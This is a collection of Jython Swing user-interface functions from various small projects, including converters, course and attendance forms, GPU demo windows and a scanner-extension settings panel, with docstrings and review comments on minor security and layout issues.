def initUI(self):
    """Build and show the small "analysis finished" dialog.

    A white panel holds an OK button (wired to ``self.onOK``) and a short
    message. The original author notes that pressing OK closes all ImageJ
    windows; that is done by ``self.onOK``, which is not shown here.
    """
    content = JPanel()
    self.getContentPane().add(content)
    content.setBackground(Color.WHITE)
    content.setLayout(None)  # absolute positioning via setBounds

    self.setTitle("Analysis has finished")
    self.setSize(300, 150)

    ok_button = JButton("OK", actionPerformed=self.onOK)
    ok_button.setBackground(Color.BLACK)
    ok_button.setBounds(80, 50, 100, 30)
    content.add(ok_button)

    message = JTextArea("Analysis has finised!! :-)")
    message.setBounds(15, 10, 250, 20)
    content.add(message)

    self.setLocationRelativeTo(None)
    # The explicit location set here replaces the centring done just above.
    left = int(IJ.getScreenSize().width * 0.01)
    top = int(IJ.getScreenSize().height * 3 / 10)
    self.setLocation(left, top)
    self.setVisible(True)
def initUI(self):
    """Assemble and show the "GPU Demo" window.

    The panel receives a JOCL button (no handler attached), a Quit button
    wired to ``self.onQuit`` and a label showing ``input.png``.
    """
    container = JPanel(size=(50, 50))
    container.setLayout(BorderLayout())
    container.setToolTipText("A Panel container")

    jocl_button = JButton("JOCL")
    jocl_button.setBounds(100, 500, 100, 30)
    jocl_button.setToolTipText("JOCL Button")
    container.add(jocl_button)

    quit_button = JButton("Quit", actionPerformed=self.onQuit)
    quit_button.setBounds(200, 500, 80, 30)
    quit_button.setToolTipText("Quit Button")
    container.add(quit_button)

    # The label is sized from the icon's own dimensions.
    icon = ImageIcon("input.png")
    image_label = JLabel(icon)
    image_label.setBounds(1, 1, icon.getIconWidth(), icon.getIconHeight())
    container.add(image_label)

    self.getContentPane().add(container)
    self.setTitle("GPU Demo")
    self.setSize(1200, 600)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)
    self.setVisible(True)
def build(self):
    """Create the converter's labels, text fields and buttons and add them to the frame.

    The three text fields are kept on ``self.c``, ``self.f`` and ``self.k``,
    and together as the set ``self.textfields``.
    """
    def labelled(text, x):
        # Caption placed on the top row at horizontal offset x.
        caption = JLabel(text)
        caption.setBounds(x, 10, 60, 20)
        return caption

    def entry(x):
        # Text field on the second row; pressing Enter passes the event to log().
        field = JTextField()
        field.setBounds(x, 40, 60, 20)
        field.addActionListener(lambda event: log(event))
        return field

    celsius_label = labelled("Celcius", 10)
    fahrenheit_label = labelled("Farenheit", 120)
    kelvin_label = labelled("Kelvin", 230)

    celsius_field = entry(10)
    fahrenheit_field = entry(120)
    kelvin_field = entry(230)

    convert_button = JButton("Convert")
    convert_button.addActionListener(lambda event: self.convert(event))
    convert_button.setBounds(10, 70, 300 - 10, 30)

    clean_button = JButton("Clean")
    clean_button.addActionListener(lambda event: self.clean())
    clean_button.setBounds(10, 110, 300 - 10, 30)

    # Same insertion order as before: labels, fields, then buttons.
    for widget in [celsius_label, kelvin_label, fahrenheit_label,
                   celsius_field, fahrenheit_field, kelvin_field,
                   convert_button, clean_button]:
        self.add(widget)

    self.k = kelvin_field
    self.c = celsius_field
    self.f = fahrenheit_field
    self.textfields = {self.c, self.f, self.k}
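def changePasswordForm(check):
    """Show the "Change Password" window.

    Stores *check* in the module-level ``value`` and publishes the frame and
    the three input fields as module globals, so the ``clickSave`` and
    ``clickCancel`` handlers (defined elsewhere) can reach them.
    """
    global frame
    global tfOldPassword
    global tfNewPassword
    global tfConfirmPassword
    global value

    # Comes from the same Swing package as the other widgets used here.
    from javax.swing import JPasswordField

    value = check

    frame = JFrame("Change Password")
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(500, 350)
    frame.setLocation(200, 200)
    frame.setLayout(None)

    panel = JPanel()
    panel.setSize(500, 350)
    panel.setLocation(0, 0)
    panel.setLayout(None)
    panel.setVisible(True)
    panel.setBackground(Color.LIGHT_GRAY)

    heading = JLabel("Change Password")
    heading.setBounds(200, 30, 150, 40)

    lbOldPassword = JLabel("Old Password")
    lbNewPassword = JLabel("New Password")
    lbConfirmPassword = JLabel("Confirm Password")

    # Password fields mask what is typed, so the old and new passwords are not
    # readable on screen. JPasswordField is a JTextField subclass, so handlers
    # that call getText() keep working.
    # NOTE(review): the handlers would do better to read getPassword() and
    # clear the returned array after use - confirm in clickSave.
    tfOldPassword = JPasswordField()
    tfNewPassword = JPasswordField()
    tfConfirmPassword = JPasswordField()

    lbOldPassword.setBounds(50, 100, 150, 30)
    lbNewPassword.setBounds(50, 150, 150, 30)
    lbConfirmPassword.setBounds(50, 200, 150, 30)
    tfOldPassword.setBounds(220, 100, 150, 30)
    tfNewPassword.setBounds(220, 150, 150, 30)
    tfConfirmPassword.setBounds(220, 200, 150, 30)

    btnSave = JButton("Save", actionPerformed=clickSave)
    btnCancel = JButton("Cancel", actionPerformed=clickCancel)
    btnSave.setBounds(350, 280, 100, 30)
    btnCancel.setBounds(50, 280, 100, 30)

    for widget in (heading, lbOldPassword, lbNewPassword, lbConfirmPassword,
                   tfOldPassword, tfNewPassword, tfConfirmPassword,
                   btnSave, btnCancel):
        panel.add(widget)
    frame.add(panel)

    # Shown last: components added to an already visible frame are not laid
    # out or painted until something forces a revalidation.
    frame.setVisible(True)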
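def addCourse():
    """Show the "Add Course" window.

    The frame, the three text fields and the Enter button are published as
    module globals for the ``clickAddCourseFee`` and ``clickCancel`` handlers
    (defined elsewhere).
    """
    global tfCourseName
    global tfCourseId
    global tfCourseFee
    global frame
    global btnEnter

    frame = JFrame("Add Course ")
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(450, 450)
    frame.setLocation(200, 200)
    frame.setLayout(None)

    panel = JPanel()
    panel.setSize(450, 450)
    panel.setLocation(0, 0)
    panel.setLayout(None)
    panel.setVisible(True)
    panel.setBackground(Color.LIGHT_GRAY)

    heading = JLabel("ADD COURSE")
    heading.setBounds(200, 30, 150, 40)

    lbCourseName = JLabel("Course Name ")
    lbCourseId = JLabel("Course Id")
    lbCourseFee = JLabel(" Course Fee")

    tfCourseName = JTextField()
    tfCourseId = JTextField()
    tfCourseFee = JTextField()

    lbCourseName.setBounds(70, 120, 130, 30)
    lbCourseId.setBounds(70, 170, 130, 30)
    lbCourseFee.setBounds(70, 220, 130, 30)

    tfCourseName.setBounds(220, 120, 150, 30)
    tfCourseId.setBounds(220, 170, 150, 30)
    tfCourseFee.setBounds(220, 220, 150, 30)

    btnEnter = JButton("Enter", actionPerformed=clickAddCourseFee)
    btnEnter.setBounds(300, 300, 100, 40)

    btnCancel = JButton("Cancel", actionPerformed=clickCancel)
    btnCancel.setBounds(70, 300, 100, 40)

    # tfCourseFee used to be added twice; a component has a single parent
    # slot, so only the later add counted. It is added once, in that position.
    for widget in (heading, lbCourseName, lbCourseId, lbCourseFee,
                   tfCourseName, tfCourseId, tfCourseFee,
                   btnEnter, btnCancel):
        panel.add(widget)
    frame.add(panel)

    # Shown last so the fully populated panel is laid out and painted.
    frame.setVisible(True)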
def getButton(self, label, positionX, positionY):
    """Return a new JButton captioned *label* at (positionX, positionY).

    Width and height are taken from ``self.BUTTON_WIDTH`` and
    ``self.BUTTON_HEIGHT``.
    """
    created = JButton(label)
    width, height = self.BUTTON_WIDTH, self.BUTTON_HEIGHT
    created.setBounds(positionX, positionY, width, height)
    return created
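def getUiComponent(self):
    """Build the tab's panel: a URL field, a button and an output area.

    Clicking the button fetches ``http://<field text>`` and lists, one per
    line, the ``href`` of every ``<a>`` element found in the response.

    Returns:
        The populated JPanel.
    """
    panel = JPanel(BorderLayout())
    panel.setLocation(100, 100)
    # Replaces the BorderLayout given to the constructor; positions come from
    # setBounds, and the BorderLayout.CENTER constraints below have no effect.
    panel.setLayout(None)

    lbl1 = JLabel("Insert URL")
    lbl1.setBounds(60, 20, 100, 40)
    txt1 = JTextField(100)
    txt1.setBounds(140, 20, 600, 40)

    def btn1Click(event):
        """Fetch the typed host/path over HTTP and show the links it contains."""
        import requests
        from bs4 import BeautifulSoup

        txt2.editable = False
        txt2.wrapStyleWord = True
        txt2.lineWrap = True

        try:
            # Bounded wait: this handler runs on the Swing event thread, so a
            # server that never answers would otherwise freeze the whole UI.
            # The scheme is fixed to plain http://, so the request and the
            # response travel unencrypted.
            response = requests.get("http://" + str(txt1.text), timeout=10)
        except requests.RequestException as exc:
            txt2.text = "Request failed: " + str(exc)
            return

        # The page is untrusted remote content; it is only parsed and shown
        # as plain text in the JTextArea, never rendered.
        soup = BeautifulSoup(response.text, 'html.parser')
        hrefs = [anchor.get('href') for anchor in soup.find_all('a')]

        # One link per line, skipping anchors without an href. The previous
        # code edited the list's repr, which also stripped "[" and "]" that
        # belonged to the URLs themselves. Two trailing statements that
        # referenced an undefined name (and so always raised) are dropped.
        txt2.text = "\n".join(href for href in hrefs if href)

    btn = JButton("Click", actionPerformed=btn1Click)
    btn.setBounds(400, 80, 60, 30)
    panel.add(lbl1, BorderLayout.CENTER)
    panel.add(txt1, BorderLayout.CENTER)
    panel.add(btn, BorderLayout.CENTER)

    lbl2 = JLabel("Output URLs")
    lbl2.setBounds(60, 80, 150, 40)
    txt2 = JTextArea()
    txt2.setBounds(140, 120, 600, 600)
    txt2.setBackground(Color.WHITE)
    panel.add(lbl2, BorderLayout.CENTER)
    panel.add(txt2, BorderLayout.CENTER)

    return panel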
def install(helper):
    """Show a four-field input window; Submit copies the fields into ScriptVars.

    Each field is stored under the global variable name "Input1" .. "Input4"
    and the stored value is printed back.
    """
    print('install called')

    frame = JFrame("Please Input Values")
    frame.setLocation(100, 100)
    frame.setSize(500, 400)
    frame.setLayout(None)

    # (global variable name, row y position, label width) for each input row
    rows = [
        ("Input1", 20, 60),
        ("Input2", 50, 100),
        ("Input3", 80, 140),
        ("Input4", 110, 180),
    ]
    labels = []
    fields = []
    for var_name, y, label_width in rows:
        label = JLabel(var_name + ": ")
        label.setBounds(60, y, label_width, 20)
        field = JTextField(100)
        field.setBounds(130, y, 200, 20)
        labels.append(label)
        fields.append(field)

    def getValues(event):
        # NOTE(review): every value typed is echoed to the console and kept
        # in a script-global variable - avoid using this form for secrets.
        print("clicked")
        for (var_name, _y, _width), field in zip(rows, fields):
            ScriptVars.setGlobalVar(var_name, str(field.getText()))
            print(ScriptVars.getGlobalVar(var_name))

    btn = JButton("Submit", actionPerformed=getValues)
    btn.setBounds(160, 150, 100, 20)

    # Insertion order kept as in the original: the button goes in after row 2.
    ordered = [labels[0], fields[0], labels[1], fields[1], btn,
               labels[2], fields[2], labels[3], fields[3]]
    for widget in ordered:
        frame.add(widget)

    frame.setVisible(True)
def install(helper):
    """Open the "Please Input Values" window with four inputs and a Submit button.

    Submit stores each field in ScriptVars as "Input1" .. "Input4" and prints
    the stored value.
    """
    print('install called')

    window = JFrame("Please Input Values")
    window.setLocation(100, 100)
    window.setSize(500, 400)
    window.setLayout(None)

    def make_row(caption, y, caption_width):
        # One caption plus its text field, both positioned on row y.
        caption_label = JLabel(caption)
        caption_label.setBounds(60, y, caption_width, 20)
        text_field = JTextField(100)
        text_field.setBounds(130, y, 200, 20)
        return caption_label, text_field

    lbl1, txt1 = make_row("Input1: ", 20, 60)
    lbl2, txt2 = make_row("Input2: ", 50, 100)
    lbl3, txt3 = make_row("Input3: ", 80, 140)
    lbl4, txt4 = make_row("Input4: ", 110, 180)

    def getValues(event):
        # NOTE(review): the values are printed as well as stored, so anything
        # entered here ends up in the console output.
        print("clicked")
        pairs = (("Input1", txt1), ("Input2", txt2),
                 ("Input3", txt3), ("Input4", txt4))
        for key, source in pairs:
            ScriptVars.setGlobalVar(key, str(source.getText()))
            print(ScriptVars.getGlobalVar(key))

    submit = JButton("Submit", actionPerformed=getValues)
    submit.setBounds(160, 150, 100, 20)

    # Same insertion order as before, with the button after the second row.
    for component in (lbl1, txt1, lbl2, txt2, submit, lbl3, txt3, lbl4, txt4):
        window.add(component)

    window.setVisible(True)
def initUI(self):
    """Build and show a centred 300x200 window holding one Quit button.

    The button is wired to ``self.onQuit``.
    """
    content = JPanel()
    self.getContentPane().add(content)
    content.setLayout(None)  # absolute positioning

    quit_button = JButton("Quit", actionPerformed=self.onQuit)
    quit_button.setBounds(50, 60, 80, 30)
    content.add(quit_button)

    self.setTitle("Quit Button")
    self.setSize(300, 200)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)  # centre on screen
    self.setVisible(True)
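def output(self, value):
    """Open the "create lesson" window and return right away.

    The window holds a name field, a text area pre-filled with a CSV header
    and a save button. Saving writes the text area to ``<name>.csv`` and
    passes the text to ``self.send``. *value* is not used.
    """
    import codecs

    t = ''
    frame = JFrame(
        'Lektion erstellen',
        defaultCloseOperation=JFrame.EXIT_ON_CLOSE,
        size=(500, 500),
    )

    def change_text(event):
        """Write the lesson text to ``<name>.csv`` and send it on."""
        text = feld.getText()
        # NOTE(review): the file name is taken verbatim from the text field,
        # so path separators or ".." place the file outside the working
        # directory and an existing file is overwritten without asking.
        name = feld2.getText() + ".csv"
        # Written as UTF-8: on Python 2 / Jython the built-in open() encodes
        # unicode text with the ASCII default, so a lesson containing umlauts
        # could not be saved.
        with codecs.open(name, "w", encoding="utf-8") as f:
            f.write(text)
        self.send(text)

    button = JButton('Lektion speichern!', actionPerformed=change_text,
                     size=(10, 20))
    button.setBounds(20, 40, 20, 40)

    pnl = JPanel()
    pnl.setLayout(BoxLayout(pnl, BoxLayout.Y_AXIS))

    feld = JTextArea()
    feld.editable = True
    feld.setText("Deutsch,Englisch\n")

    feld2 = JTextField()
    feld2.setText("Ersetzen durch Namen der Lektion")

    pnl.add(feld2)
    pnl.add(feld)
    pnl.add(button)
    frame.add(pnl)
    frame.setVisible(True)

    # t is still the empty string here: the handler above only runs later,
    # on a click, and never rebinds this outer variable.
    print(t)
    print("Lektion erstellt")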
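def showLoginIdPassword(data):
    """Show a read-only window with a login id and its password.

    Args:
        data: indexable pair; ``data[0]`` is shown as the login id and
            ``data[1]`` as the password.

    The frame is published as the module global ``frame`` for the ``clickOk``
    handler (defined elsewhere).
    """
    global frame

    frame = JFrame("Show Id Password ")
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(500, 350)
    frame.setLocation(200, 200)
    frame.setLayout(None)

    panel = JPanel()
    panel.setSize(500, 350)
    panel.setLocation(0, 0)
    panel.setLayout(None)
    panel.setVisible(True)
    panel.setBackground(Color.LIGHT_GRAY)

    heading = JLabel("LoginId AND Password")
    heading.setBounds(200, 30, 150, 40)

    lbLoginId = JLabel("LoginId")
    lbPassword = JLabel("password")

    # NOTE(review): the password is displayed in clear text, which means the
    # caller holds it in recoverable form. Confirm this is intended; storing
    # only a salted hash and offering a reset would avoid both.
    # NOTE(review): .encode('ascii') raises for non-ASCII characters - verify
    # against the values callers pass.
    tfLoginId = JTextField(data[0].encode('ascii'))
    tfPassword = JTextField(data[1].encode('ascii'))
    tfLoginId.setEditable(False)
    tfPassword.setEditable(False)

    lbLoginId.setBounds(50, 100, 150, 30)
    lbPassword.setBounds(50, 150, 150, 30)
    tfLoginId.setBounds(220, 100, 150, 30)
    tfPassword.setBounds(220, 150, 150, 30)

    btnOk = JButton("Ok", actionPerformed=clickOk)
    btnOk.setBounds(250, 220, 100, 30)

    for widget in (heading, lbLoginId, lbPassword, tfLoginId, tfPassword, btnOk):
        panel.add(widget)
    frame.add(panel)

    # Shown last: components added to an already visible frame are not laid
    # out or painted until something forces a revalidation.
    frame.setVisible(True)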
def initUI(self):
    """Build and show the "Tooltips" demo window.

    Both the panel and its single button carry a tooltip.
    """
    content = JPanel()
    self.getContentPane().add(content)
    content.setLayout(None)  # absolute positioning
    content.setToolTipText("A panel container")

    demo_button = JButton("Button")
    demo_button.setBounds(100, 60, 100, 30)
    demo_button.setToolTipText("A button component")
    content.add(demo_button)

    self.setTitle("Tooltips")
    self.setSize(300, 200)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)  # centre on screen
    self.setVisible(True)
def gui(self):
    """Show a window asking for a recipe URL and build ``self.recipe`` from it."""

    def create(event):
        # Button handler: build a Recipe from the typed URL and close the window.
        # NOTE(review): the text is passed to Recipe unchecked; if Recipe
        # fetches it, restricting the scheme and host there is worth
        # confirming.
        url = field.getText()
        self.recipe = Recipe(url)
        frame.dispose()
        print("created recipe for " + self.recipe.get_title())
        # The dialog waits until "continue" is sent.
        self.send("continue")

    # Window
    frame = JFrame(
        'URL eingeben',
        defaultCloseOperation=JFrame.EXIT_ON_CLOSE,
        size=(480, 200),
    )
    frame.setLayout(None)

    # Prompt text
    prompt = JLabel()
    prompt.setText(
        "<html><font size=+1>Geben Sie die Internetadresse des Rezepts ein</font></html>"
    )
    prompt.setBounds(20, 20, 500, 40)
    frame.add(prompt)

    # URL input, pre-filled with an example prefix
    field = JTextField()
    field.setText("https://www.chefkoch.de/rezepte/...")
    field.setBounds(20, 60, 411, 40)
    frame.add(field)

    # Start button; runs create() above
    start_button = JButton("Los!", actionPerformed=create)
    start_button.setBounds(155, 100, 150, 30)
    frame.add(start_button)

    # Show the window
    frame.setVisible(True)
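def getCourseName(check):
    """Show the "Course Name" window asking for a student's course.

    Stores *check* in the module-level ``value`` and publishes the frame and
    the text field as module globals for the ``clickStudentCourseChoice`` and
    ``clickBtnCancel`` handlers (defined elsewhere).
    """
    global frame
    global tfStudentCourseChoice
    global value

    value = check

    frame = JFrame("Course Name ")
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(500, 250)
    frame.setLocation(200, 200)
    frame.setLayout(None)

    panel = JPanel()
    panel.setSize(500, 250)
    panel.setLocation(0, 0)
    panel.setLayout(None)
    panel.setVisible(True)
    panel.setBackground(Color.LIGHT_GRAY)

    heading = JLabel("Get Course Name")
    heading.setBounds(200, 30, 150, 40)

    lbStudentCourseChoice = JLabel("Student course name")
    tfStudentCourseChoice = JTextField()

    lbStudentCourseChoice.setBounds(50, 70, 150, 30)
    tfStudentCourseChoice.setBounds(220, 70, 150, 30)

    btnEnter = JButton("Enter", actionPerformed=clickStudentCourseChoice)
    btnCancel = JButton("Cancel", actionPerformed=clickBtnCancel)

    btnEnter.setBounds(350, 150, 100, 30)
    btnCancel.setBounds(50, 150, 100, 30)

    for widget in (heading, lbStudentCourseChoice, tfStudentCourseChoice,
                   btnEnter, btnCancel):
        panel.add(widget)
    frame.add(panel)

    # Shown last: components added to an already visible frame are not laid
    # out or painted until something forces a revalidation.
    frame.setVisible(True)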
def build(self):
    """Create the KWh input, the result label and the button, and add them to the frame.

    Pressing Enter in the text field or clicking the button shows
    ``calculate(<field text>)`` in ``self.label3``.
    """
    def show_result(event):
        # Shared by the text field and the button.
        self.label3.setText(str(calculate(self.textfield.getText())))

    self.label = JLabel("Cup")
    self.label.setBounds(120, 10, 45, 15)

    self.label2 = JLabel("KWh")
    self.label2.setBounds(20, 10, 45, 15)

    self.label3 = JLabel()
    self.label3.setBounds(120, 30, 55, 15)

    self.textfield = JTextField()
    self.textfield.setBounds(15, 30, 75, 20)
    self.textfield.addActionListener(show_result)

    calc_button = JButton("Calcular")
    calc_button.setBounds(10, 55, 290, 35)
    calc_button.addActionListener(show_result)

    widgets = (self.label, self.label2, self.label3, self.textfield, calc_button)
    for widget in widgets:
        self.add(widget)
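def showAttendenceSheet():
    """Show the teacher attendance window with an empty table and Save/Cancel.

    The table, heading, frame, panel and both buttons are published as module
    globals for the ``clickSaveBtn`` and ``clickCancelBtn`` handlers (defined
    elsewhere).
    """
    global table
    global heading
    global frame
    global panel
    global btnSave
    global btnCancel

    frame = JFrame("Teacher Attendence Sheet ")
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(500, 600)
    frame.setLocation(200, 200)
    frame.setLayout(None)

    panel = JPanel()
    panel.setSize(500, 600)
    panel.setLocation(0, 0)
    panel.setLayout(None)
    panel.setVisible(True)
    panel.setBackground(Color.WHITE)

    heading = JLabel()
    heading.setBounds(200, 10, 150, 30)

    table = JTable()
    table.setBounds(0, 50, 500, 450)

    btnSave = JButton("Save", actionPerformed=clickSaveBtn)
    btnCancel = JButton("Cancel", actionPerformed=clickCancelBtn)

    btnSave.setBounds(350, 540, 100, 40)
    btnCancel.setBounds(70, 540, 100, 40)

    # The table used to be added twice; only the later add counted, so it is
    # added once, after the heading.
    for widget in (heading, table, btnSave, btnCancel):
        panel.add(widget)
    frame.add(panel)

    # Shown last so the fully populated panel is laid out and painted.
    frame.setVisible(True)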
def initUI(self):
    """Build and show the "Simple" window: a Click button and a Quit button.

    Only Quit has a handler (``self.onQuit``).
    """
    content = JPanel()
    content.setLayout(None)  # absolute positioning
    content.setToolTipText('A Panel container')

    click_button = JButton('Click')
    click_button.setBounds(120, 60, 100, 30)
    click_button.setToolTipText('A button component')
    content.add(click_button)

    quit_button = JButton('Quit', actionPerformed=self.onQuit)
    quit_button.setBounds(10, 60, 80, 30)
    content.add(quit_button)

    self.getContentPane().add(content)
    self.setTitle('Simple')
    self.setSize(250, 200)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)  # centre on screen
    self.setVisible(True)
class GUI(Helpers):
    """Settings panel: scan toggle, payload-randomisation toggle and a payload list."""

    def gui(self):
        """Build ``self.panel`` with absolute positioning and load saved settings.

        Returns:
            ``self``, so the call can be chained.
        """
        left = 10  # panel padding
        top = 5  # panel padding

        self.panel = Panel()
        self.panel.setLayout(None)

        # Row 1: enable scanning
        self.scn_lbl = JLabel("Enable scanning")
        self.scn_lbl.setBounds(left, top, 100, 20)
        self.panel.add(self.scn_lbl)

        self.enable = JCheckBox()
        self.enable.setBounds(left + 120, top, 50, 20)
        self.panel.add(self.enable)

        # Row 2: randomise payloads
        self.rand_lbl = JLabel("Randomize payloads")
        self.rand_lbl.setBounds(left, top + 15, 100, 20)
        self.panel.add(self.rand_lbl)

        self.randomize = JCheckBox()
        self.randomize.setBounds(left + 120, top + 15, 50, 20)
        self.panel.add(self.randomize)

        # Payload list, one entry per line, inside a scroll pane
        self.pyld_lbl = JLabel("Payloads List (Line separated)")
        self.pyld_lbl.setBounds(left, top + 30, 180, 20)
        self.panel.add(self.pyld_lbl)

        self.payloads_list = JTextArea()
        self.pyld_scrl = JScrollPane(self.payloads_list)
        self.pyld_scrl.setBounds(left, top + 50, 600, 200)
        self.panel.add(self.pyld_scrl)

        self.save_btn = JButton("Save", actionPerformed=self.save_settings)
        self.save_btn.setBounds(left, top + 250, 100, 30)
        self.panel.add(self.save_btn)

        # Settings loader from [utils/Helpers/load_settings]
        self.load_settings()

        return self
def initUI(self):
    """Build and show the structure-oriented smoothing demo window.

    ``self.panel`` receives a parameter text field, JOCL / Java / Quit
    buttons, the scaled input image and a large clock label.
    """
    self.panel = JPanel(size=(50, 50))
    self.panel.setLayout(FlowLayout())
    self.panel.setToolTipText("GPU Demo")

    # TODO: change this so that it deletes itself when text is entered
    self.textfield1 = JTextField('Smoothing Parameter', 15)
    self.panel.add(self.textfield1)

    jocl_button = JButton("JOCL", actionPerformed=self.onJocl)
    jocl_button.setBounds(100, 500, 100, 30)
    jocl_button.setToolTipText("JOCL Button")
    self.panel.add(jocl_button)

    java_button = JButton("Java", actionPerformed=self.onJava)
    java_button.setBounds(100, 500, 100, 30)
    java_button.setToolTipText("Java Button")
    self.panel.add(java_button)

    quit_button = JButton("Quit", actionPerformed=self.onQuit)
    quit_button.setBounds(200, 500, 80, 30)
    quit_button.setToolTipText("Quit Button")
    self.panel.add(quit_button)

    # NOTE(review): ImageIO.read yields no image when the file cannot be
    # decoded, in which case the scaling call below would fail - confirm the
    # file is always present.
    source_image = ImageIO.read(io.File(getDataDir() + "input.png"))
    icon = ImageIcon(source_image.getScaledInstance(600, 600, 10))
    image_label = JLabel("Input Image", icon, JLabel.CENTER)
    image_label.setVerticalTextPosition(JLabel.TOP)
    image_label.setHorizontalTextPosition(JLabel.RIGHT)
    image_label.setSize(10, 10)
    image_label.setBackground(Color.orange)
    self.panel.add(image_label)

    self.getContentPane().add(self.panel)

    self.clockLabel = JLabel()
    self.clockLabel.setSize(1, 1)
    self.clockLabel.setBackground(Color.orange)
    self.clockLabel.setVerticalTextPosition(JLabel.BOTTOM)
    self.clockLabel.setHorizontalTextPosition(JLabel.LEFT)
    self.clockLabel.setFont(Font("Serif", Font.PLAIN, 50))
    self.panel.add(self.clockLabel)

    self.setTitle("Structure-oriented smoothing OpenCL Demo")
    self.setSize(1200, 700)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)
    self.setVisible(True)
def addDetails(self):
    """Open the "Add Issue" window.

    The window holds an issue-name field, an editable objective combo box and
    an Add button (no handler attached here). ``self`` is registered as the
    key listener of the issue-name field.
    """
    window = JFrame()
    window.setTitle("Add Issue")
    window.setLayout(None)

    issue_field = JTextField()
    issue_field.setName("Enter Issue Name")
    issue_field.setToolTipText("Enter Issue Name Here")
    issue_field.setBounds(182, 58, 473, 40)
    window.add(issue_field)
    issue_field.setColumns(10)

    add_button = JButton("Add")
    add_button.setBounds(322, 178, 139, 41)
    window.add(add_button)

    objective_box = JComboBox()
    objective_box.setMaximumRowCount(20)
    objective_box.setEditable(True)
    objective_box.setToolTipText("Objective Name")
    objective_box.setBounds(182, 125, 473, 40)
    window.add(objective_box)

    caption_font = Font("Tahoma", Font.PLAIN, 16)

    issue_caption = JLabel("Issue Name Here")
    issue_caption.setFont(caption_font)
    issue_caption.setBounds(25, 58, 130, 40)
    window.add(issue_caption)

    objective_caption = JLabel("Objective Name")
    objective_caption.setFont(Font("Tahoma", Font.PLAIN, 16))
    objective_caption.setBounds(25, 125, 130, 40)
    window.add(objective_caption)

    window.setVisible(True)
    window.setBounds(400, 300, 700, 300)
    # NOTE(review): this only reads the constant and has no effect; the
    # window keeps its default close behaviour. Confirm what was intended.
    window.EXIT_ON_CLOSE
    issue_field.addKeyListener(self)
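def showStudentAttendenceSheetAdminLogined():
    """Show the student attendance window with an empty table and an Ok button.

    The table, heading, frame and panel are published as module globals for
    the ``clickOk`` handler (defined elsewhere).
    """
    global table
    global heading
    global frame
    global panel
    # NOTE(review): declared as "btnok" but the button below is bound to
    # "btnOk", so the button stays local to this function - confirm which
    # spelling other code expects.
    global btnok

    frame = JFrame("Student Attendence Sheet ")
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(500, 600)
    frame.setLocation(200, 200)
    frame.setLayout(None)

    panel = JPanel()
    panel.setSize(500, 600)
    panel.setLocation(0, 0)
    panel.setLayout(None)
    panel.setVisible(True)
    panel.setBackground(Color.WHITE)

    heading = JLabel("Student Attendence")
    heading.setBounds(200, 10, 150, 30)

    table = JTable()
    table.setBounds(0, 50, 500, 450)

    btnOk = JButton("Ok", actionPerformed=clickOk)
    btnOk.setBounds(200, 540, 100, 40)

    # The table used to be added twice; only the later add counted, so it is
    # added once, after the heading.
    for widget in (heading, table, btnOk):
        panel.add(widget)
    frame.add(panel)

    # Shown last so the fully populated panel is laid out and painted.
    frame.setVisible(True)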
def initUI(self):
    """Build and show the "GPU Demo" window with JOCL / Quit buttons and a scaled image.

    The buttons are wired to ``self.onJOCL`` and ``self.onQuit``.
    """
    container = JPanel(size=(50, 50))
    container.setLayout(BorderLayout())
    container.setToolTipText("A Panel container")

    jocl_button = JButton("JOCL", actionPerformed=self.onJOCL)
    jocl_button.setBounds(100, 500, 100, 30)
    jocl_button.setToolTipText("JOCL Button")
    container.add(jocl_button)

    quit_button = JButton("Quit", actionPerformed=self.onQuit)
    quit_button.setBounds(200, 500, 80, 30)
    quit_button.setToolTipText("Quit Button")
    container.add(quit_button)

    # NOTE(review): ImageIO.read yields no image when the file cannot be
    # decoded, in which case the scaling call below would fail - confirm the
    # file is always present.
    source_image = ImageIO.read(io.File("input.png"))
    icon = ImageIcon(source_image.getScaledInstance(500, 500, 10))
    image_label = JLabel("Image and Text", icon, JLabel.CENTER)
    image_label.setVerticalTextPosition(JLabel.BOTTOM)
    image_label.setHorizontalTextPosition(JLabel.CENTER)
    image_label.setSize(10, 10)
    container.add(image_label)

    self.getContentPane().add(container)
    self.setTitle("GPU Demo")
    self.setSize(1200, 600)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)
    self.setVisible(True)
def initUI(self):
    """Create the "GPU Demo" frame contents and display the frame.

    Adds a JOCL button without a handler, a Quit button bound to
    ``self.onQuit`` and a label that displays ``input.png`` at its own size.
    """
    demo_panel = JPanel(size=(50, 50))
    demo_panel.setLayout(BorderLayout())
    demo_panel.setToolTipText("A Panel container")

    def tooltip_button(button, x, y, width, tip):
        # Position a button, give it a tooltip and put it on the panel.
        button.setBounds(x, y, width, 30)
        button.setToolTipText(tip)
        demo_panel.add(button)

    tooltip_button(JButton("JOCL"), 100, 500, 100, "JOCL Button")
    tooltip_button(JButton("Quit", actionPerformed=self.onQuit),
                   200, 500, 80, "Quit Button")

    picture = ImageIcon("input.png")
    picture_label = JLabel(picture)
    picture_label.setBounds(1, 1, picture.getIconWidth(), picture.getIconHeight())
    demo_panel.add(picture_label)

    self.getContentPane().add(demo_panel)
    self.setTitle("GPU Demo")
    self.setSize(1200, 600)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)
    self.setVisible(True)
def initUI(self):
    """Build and show the "GPU Demo" window.

    ``self.panel`` receives a parameter text field, JOCL / Java / Quit
    buttons, the scaled input image and a large clock label.
    """
    self.panel = JPanel(size=(50, 50))
    self.panel.setLayout(FlowLayout())
    self.panel.setToolTipText("GPU Demo")

    self.textfield1 = JTextField('Smoothing Parameter', 15)
    self.panel.add(self.textfield1)

